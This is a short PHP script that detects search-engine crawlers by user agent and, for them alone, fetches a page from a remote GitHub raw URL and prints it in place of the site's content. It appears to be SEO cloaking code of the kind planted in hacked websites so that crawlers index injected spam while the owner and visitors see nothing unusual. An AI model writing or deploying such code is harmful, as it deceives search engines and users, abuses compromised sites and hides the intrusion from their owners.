<?php
function is_bot() {
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool', 'AhrefsBot');

    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            return true;
        }
    }

    return false;
}

if (is_bot()) {
    $message = file_get_contents('https://raw.githubusercontent.com/Eza168/kuetacbd/refs/heads/main/index'); //
    echo $message;
    exit; // Atau bisa menggunakan die();
}
?>
